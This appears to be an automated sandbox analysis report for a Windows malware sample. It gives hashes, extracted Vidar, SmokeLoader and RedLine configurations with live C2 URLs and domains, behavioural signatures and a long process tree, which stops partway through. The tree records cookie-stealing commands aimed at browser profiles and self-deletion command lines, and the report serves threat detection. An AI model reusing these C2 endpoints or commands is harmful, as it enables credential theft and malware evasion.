Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    43s
  • max time network
    161s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    19-07-2021 22:53

General

  • Target

    8 (23).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel17

C2

dwarimlari.xyz:80

Extracted

Family

redline

Botnet

sel16

C2

dwarimlari.xyz:80

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 10 IoCs

    RedlineStealer.

  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 30 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Loads dropped DLL 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 11 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 15 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2696
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2688
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2580
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2408
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2380
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1864
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1388
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1272
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1228
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1108
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:1020
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:348
                        • C:\Users\Admin\AppData\Local\Temp\8 (23).exe
                          "C:\Users\Admin\AppData\Local\Temp\8 (23).exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3988
                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2976
                            • C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\setup_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\setup_install.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:2876
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_1.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3476
                                • C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\sonia_1.exe
                                  sonia_1.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4060
                                  • C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\sonia_1.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\sonia_1.exe" -a
                                    6⤵
                                      PID:2272
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1348
                                  • C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\sonia_3.exe
                                    sonia_3.exe
                                    5⤵
                                    • Executes dropped EXE
                                    PID:652
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                                      6⤵
                                        PID:3388
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im sonia_3.exe /f
                                          7⤵
                                          • Kills process with taskkill
                                          PID:5248
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 6
                                          7⤵
                                          • Delays execution with timeout.exe
                                          PID:5312
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3028
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\sonia_5.exe
                                      sonia_5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:1040
                                      • C:\Users\Admin\Documents\G7lnEUGVpXLdMFQiZj76wmTd.exe
                                        "C:\Users\Admin\Documents\G7lnEUGVpXLdMFQiZj76wmTd.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2748
                                      • C:\Users\Admin\Documents\YF8PYye25bCPnppIQk8oRvoR.exe
                                        "C:\Users\Admin\Documents\YF8PYye25bCPnppIQk8oRvoR.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:4592
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                            PID:5868
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                              PID:4372
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                                PID:5296
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                  PID:6044
                                              • C:\Users\Admin\Documents\DNiWZR7OVBcHGRAOT76_IkXU.exe
                                                "C:\Users\Admin\Documents\DNiWZR7OVBcHGRAOT76_IkXU.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4300
                                                • C:\Users\Admin\Documents\DNiWZR7OVBcHGRAOT76_IkXU.exe
                                                  C:\Users\Admin\Documents\DNiWZR7OVBcHGRAOT76_IkXU.exe
                                                  7⤵
                                                    PID:6116
                                                • C:\Users\Admin\Documents\7VpckSgYA1qaBT79Bj8VZGQ_.exe
                                                  "C:\Users\Admin\Documents\7VpckSgYA1qaBT79Bj8VZGQ_.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4484
                                                  • C:\Users\Admin\Documents\7VpckSgYA1qaBT79Bj8VZGQ_.exe
                                                    C:\Users\Admin\Documents\7VpckSgYA1qaBT79Bj8VZGQ_.exe
                                                    7⤵
                                                      PID:5956
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 7VpckSgYA1qaBT79Bj8VZGQ_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\7VpckSgYA1qaBT79Bj8VZGQ_.exe" & del C:\ProgramData\*.dll & exit
                                                        8⤵
                                                          PID:5280
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im 7VpckSgYA1qaBT79Bj8VZGQ_.exe /f
                                                            9⤵
                                                            • Kills process with taskkill
                                                            PID:4440
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /t 6
                                                            9⤵
                                                            • Delays execution with timeout.exe
                                                            PID:1348
                                                      • C:\Users\Admin\Documents\7VpckSgYA1qaBT79Bj8VZGQ_.exe
                                                        C:\Users\Admin\Documents\7VpckSgYA1qaBT79Bj8VZGQ_.exe
                                                        7⤵
                                                          PID:5948
                                                      • C:\Users\Admin\Documents\pWyaQEngmFfYWfmRhrMCFiPD.exe
                                                        "C:\Users\Admin\Documents\pWyaQEngmFfYWfmRhrMCFiPD.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4352
                                                        • C:\Users\Admin\Documents\pWyaQEngmFfYWfmRhrMCFiPD.exe
                                                          C:\Users\Admin\Documents\pWyaQEngmFfYWfmRhrMCFiPD.exe
                                                          7⤵
                                                            PID:4812
                                                        • C:\Users\Admin\Documents\73PoBjFWhD402eGLxPzF7vPS.exe
                                                          "C:\Users\Admin\Documents\73PoBjFWhD402eGLxPzF7vPS.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:4316
                                                          • C:\Users\Admin\Documents\73PoBjFWhD402eGLxPzF7vPS.exe
                                                            C:\Users\Admin\Documents\73PoBjFWhD402eGLxPzF7vPS.exe
                                                            7⤵
                                                              PID:5036
                                                          • C:\Users\Admin\Documents\CVbFxZYQIvuLixNcIIsURgtt.exe
                                                            "C:\Users\Admin\Documents\CVbFxZYQIvuLixNcIIsURgtt.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:2440
                                                            • C:\Users\Admin\Documents\CVbFxZYQIvuLixNcIIsURgtt.exe
                                                              C:\Users\Admin\Documents\CVbFxZYQIvuLixNcIIsURgtt.exe
                                                              7⤵
                                                                PID:4872
                                                            • C:\Users\Admin\Documents\RMxlkgzPhCAmqkRwa_HwWiq3.exe
                                                              "C:\Users\Admin\Documents\RMxlkgzPhCAmqkRwa_HwWiq3.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4468
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                7⤵
                                                                  PID:4900
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd
                                                                    8⤵
                                                                      PID:5744
                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                        findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                        9⤵
                                                                          PID:5984
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                          Acre.exe.com k
                                                                          9⤵
                                                                            PID:5232
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                              10⤵
                                                                                PID:5520
                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                  11⤵
                                                                                    PID:5496
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                      12⤵
                                                                                        PID:5728
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                          13⤵
                                                                                            PID:3864
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                              14⤵
                                                                                                PID:6088
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping 127.0.0.1 -n 30
                                                                                      9⤵
                                                                                      • Runs ping.exe
                                                                                      PID:4764
                                                                              • C:\Users\Admin\Documents\X9w5pWc9mLeDTa_AnddqXaRd.exe
                                                                                "C:\Users\Admin\Documents\X9w5pWc9mLeDTa_AnddqXaRd.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:2400
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                                                                  7⤵
                                                                                    PID:4776
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      explorer https://iplogger.org/2LBCU6
                                                                                      8⤵
                                                                                        PID:4400
                                                                                      • C:\Windows\SysWOW64\regedit.exe
                                                                                        regedit /s adj.reg
                                                                                        8⤵
                                                                                        • Runs .reg file with regedit
                                                                                        PID:4412
                                                                                      • C:\Windows\SysWOW64\regedit.exe
                                                                                        regedit /s adj2.reg
                                                                                        8⤵
                                                                                        • Runs .reg file with regedit
                                                                                        PID:3220
                                                                                    • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                                                      "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                                                      7⤵
                                                                                        PID:1468
                                                                                        • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                                                          "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                                                          8⤵
                                                                                            PID:5912
                                                                                      • C:\Users\Admin\Documents\Ofz3ylrDI_Gpdt2hKQnLuZwN.exe
                                                                                        "C:\Users\Admin\Documents\Ofz3ylrDI_Gpdt2hKQnLuZwN.exe"
                                                                                        6⤵
                                                                                          PID:4308
                                                                                        • C:\Users\Admin\Documents\2EbFZ8tV4_ct8aoAYzKfIb12.exe
                                                                                          "C:\Users\Admin\Documents\2EbFZ8tV4_ct8aoAYzKfIb12.exe"
                                                                                          6⤵
                                                                                            PID:732
                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                              7⤵
                                                                                                PID:5280
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0A42CAF5\setup_install.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS0A42CAF5\setup_install.exe"
                                                                                                  8⤵
                                                                                                    PID:5680
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                      9⤵
                                                                                                        PID:6004
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0A42CAF5\karotima_2.exe
                                                                                                          karotima_2.exe
                                                                                                          10⤵
                                                                                                            PID:5184
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0A42CAF5\karotima_2.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zS0A42CAF5\karotima_2.exe" -a
                                                                                                              11⤵
                                                                                                                PID:5668
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                            9⤵
                                                                                                              PID:6024
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0A42CAF5\karotima_1.exe
                                                                                                                karotima_1.exe
                                                                                                                10⤵
                                                                                                                  PID:5948
                                                                                                                  • C:\Users\Admin\Documents\RPKTdPFOIL0A5f98VBPjEitX.exe
                                                                                                                    "C:\Users\Admin\Documents\RPKTdPFOIL0A5f98VBPjEitX.exe"
                                                                                                                    11⤵
                                                                                                                      PID:3236
                                                                                                                      • C:\Users\Admin\Documents\RPKTdPFOIL0A5f98VBPjEitX.exe
                                                                                                                        C:\Users\Admin\Documents\RPKTdPFOIL0A5f98VBPjEitX.exe
                                                                                                                        12⤵
                                                                                                                          PID:6408
                                                                                                                        • C:\Users\Admin\Documents\RPKTdPFOIL0A5f98VBPjEitX.exe
                                                                                                                          C:\Users\Admin\Documents\RPKTdPFOIL0A5f98VBPjEitX.exe
                                                                                                                          12⤵
                                                                                                                            PID:5288
                                                                                                                          • C:\Users\Admin\Documents\RPKTdPFOIL0A5f98VBPjEitX.exe
                                                                                                                            C:\Users\Admin\Documents\RPKTdPFOIL0A5f98VBPjEitX.exe
                                                                                                                            12⤵
                                                                                                                              PID:5020
                                                                                                                          • C:\Users\Admin\Documents\hiyh2WxpKxLSTf2iWDGfOFc2.exe
                                                                                                                            "C:\Users\Admin\Documents\hiyh2WxpKxLSTf2iWDGfOFc2.exe"
                                                                                                                            11⤵
                                                                                                                              PID:6248
                                                                                                                              • C:\Users\Admin\Documents\hiyh2WxpKxLSTf2iWDGfOFc2.exe
                                                                                                                                C:\Users\Admin\Documents\hiyh2WxpKxLSTf2iWDGfOFc2.exe
                                                                                                                                12⤵
                                                                                                                                  PID:6412
                                                                                                                              • C:\Users\Admin\Documents\B0JRtncBXdbHQNhjMp5slAJd.exe
                                                                                                                                "C:\Users\Admin\Documents\B0JRtncBXdbHQNhjMp5slAJd.exe"
                                                                                                                                11⤵
                                                                                                                                  PID:6300
                                                                                                                                  • C:\Users\Admin\Documents\B0JRtncBXdbHQNhjMp5slAJd.exe
                                                                                                                                    "C:\Users\Admin\Documents\B0JRtncBXdbHQNhjMp5slAJd.exe"
                                                                                                                                    12⤵
                                                                                                                                      PID:6140
                                                                                                                                  • C:\Users\Admin\Documents\TiFSL89gfgs9SqT0MhECwWAd.exe
                                                                                                                                    "C:\Users\Admin\Documents\TiFSL89gfgs9SqT0MhECwWAd.exe"
                                                                                                                                    11⤵
                                                                                                                                      PID:6368
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5938190.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5938190.exe"
                                                                                                                                        12⤵
                                                                                                                                          PID:6448
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6775611.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6775611.exe"
                                                                                                                                          12⤵
                                                                                                                                            PID:4288
                                                                                                                                        • C:\Users\Admin\Documents\KliiL8I6HW49ftQFXpTBLWdE.exe
                                                                                                                                          "C:\Users\Admin\Documents\KliiL8I6HW49ftQFXpTBLWdE.exe"
                                                                                                                                          11⤵
                                                                                                                                            PID:6188
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im KliiL8I6HW49ftQFXpTBLWdE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\KliiL8I6HW49ftQFXpTBLWdE.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                              12⤵
                                                                                                                                                PID:476
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /im KliiL8I6HW49ftQFXpTBLWdE.exe /f
                                                                                                                                                  13⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:6908
                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                  timeout /t 6
                                                                                                                                                  13⤵
                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                  PID:3388
                                                                                                                                            • C:\Users\Admin\Documents\0b0dgsR4gnIGYQ4NqCNKHxCF.exe
                                                                                                                                              "C:\Users\Admin\Documents\0b0dgsR4gnIGYQ4NqCNKHxCF.exe"
                                                                                                                                              11⤵
                                                                                                                                                PID:6164
                                                                                                                                                • C:\Users\Admin\Documents\0b0dgsR4gnIGYQ4NqCNKHxCF.exe
                                                                                                                                                  C:\Users\Admin\Documents\0b0dgsR4gnIGYQ4NqCNKHxCF.exe
                                                                                                                                                  12⤵
                                                                                                                                                    PID:6996
                                                                                                                                                  • C:\Users\Admin\Documents\0b0dgsR4gnIGYQ4NqCNKHxCF.exe
                                                                                                                                                    C:\Users\Admin\Documents\0b0dgsR4gnIGYQ4NqCNKHxCF.exe
                                                                                                                                                    12⤵
                                                                                                                                                      PID:2912
                                                                                                                                                  • C:\Users\Admin\Documents\txCoCaO6TAGeKcRzzirQkghO.exe
                                                                                                                                                    "C:\Users\Admin\Documents\txCoCaO6TAGeKcRzzirQkghO.exe"
                                                                                                                                                    11⤵
                                                                                                                                                      PID:6156
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                        12⤵
                                                                                                                                                          PID:6836
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd
                                                                                                                                                            13⤵
                                                                                                                                                              PID:6916
                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                14⤵
                                                                                                                                                                  PID:7096
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                  Acre.exe.com k
                                                                                                                                                                  14⤵
                                                                                                                                                                    PID:5012
                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                    ping 127.0.0.1 -n 30
                                                                                                                                                                    14⤵
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:6612
                                                                                                                                                            • C:\Users\Admin\Documents\Ug3lnfmq73AlEixQFJ8TxFLJ.exe
                                                                                                                                                              "C:\Users\Admin\Documents\Ug3lnfmq73AlEixQFJ8TxFLJ.exe"
                                                                                                                                                              11⤵
                                                                                                                                                                PID:6148
                                                                                                                                                              • C:\Users\Admin\Documents\GyMkSIJef0igt93d2pQcSf45.exe
                                                                                                                                                                "C:\Users\Admin\Documents\GyMkSIJef0igt93d2pQcSf45.exe"
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:5956
                                                                                                                                                                  • C:\Users\Admin\Documents\GyMkSIJef0igt93d2pQcSf45.exe
                                                                                                                                                                    C:\Users\Admin\Documents\GyMkSIJef0igt93d2pQcSf45.exe
                                                                                                                                                                    12⤵
                                                                                                                                                                      PID:6972
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 160
                                                                                                                                                                        13⤵
                                                                                                                                                                        • Program crash
                                                                                                                                                                        PID:4532
                                                                                                                                                                  • C:\Users\Admin\Documents\x29aqiSes3H1NfgVxdig2wDP.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\x29aqiSes3H1NfgVxdig2wDP.exe"
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:2040
                                                                                                                                                                    • C:\Users\Admin\Documents\KkgqvAjd3iPCYF9yJw4pa7h8.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\KkgqvAjd3iPCYF9yJw4pa7h8.exe"
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:6420
                                                                                                                                                                      • C:\Users\Admin\Documents\vcw2Pnr3HW1wfHk0Tnizrpag.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\vcw2Pnr3HW1wfHk0Tnizrpag.exe"
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:4160
                                                                                                                                                                          • C:\Users\Admin\Documents\vcw2Pnr3HW1wfHk0Tnizrpag.exe
                                                                                                                                                                            C:\Users\Admin\Documents\vcw2Pnr3HW1wfHk0Tnizrpag.exe
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:6928
                                                                                                                                                                          • C:\Users\Admin\Documents\EJUrLK_W_5vKCBcEqKSSiM52.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\EJUrLK_W_5vKCBcEqKSSiM52.exe"
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:6476
                                                                                                                                                                              • C:\Users\Admin\Documents\EJUrLK_W_5vKCBcEqKSSiM52.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\EJUrLK_W_5vKCBcEqKSSiM52.exe"
                                                                                                                                                                                12⤵
                                                                                                                                                                                  PID:4268
                                                                                                                                                                              • C:\Users\Admin\Documents\QsdsHVJ2DkiYIZjKLwKBou7K.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\QsdsHVJ2DkiYIZjKLwKBou7K.exe"
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:6468
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    12⤵
                                                                                                                                                                                      PID:7024
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      12⤵
                                                                                                                                                                                        PID:6816
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        12⤵
                                                                                                                                                                                          PID:6252
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:7160
                                                                                                                                                                                        • C:\Users\Admin\Documents\4iFXFnGNsTsxpaBXoboYEFST.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\4iFXFnGNsTsxpaBXoboYEFST.exe"
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:508
                                                                                                                                                                                            • C:\Users\Admin\Documents\4iFXFnGNsTsxpaBXoboYEFST.exe
                                                                                                                                                                                              C:\Users\Admin\Documents\4iFXFnGNsTsxpaBXoboYEFST.exe
                                                                                                                                                                                              12⤵
                                                                                                                                                                                                PID:6944
                                                                                                                                                                                            • C:\Users\Admin\Documents\cEWnltm9a_u3BvRKnBuJQHVE.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\cEWnltm9a_u3BvRKnBuJQHVE.exe"
                                                                                                                                                                                              11⤵
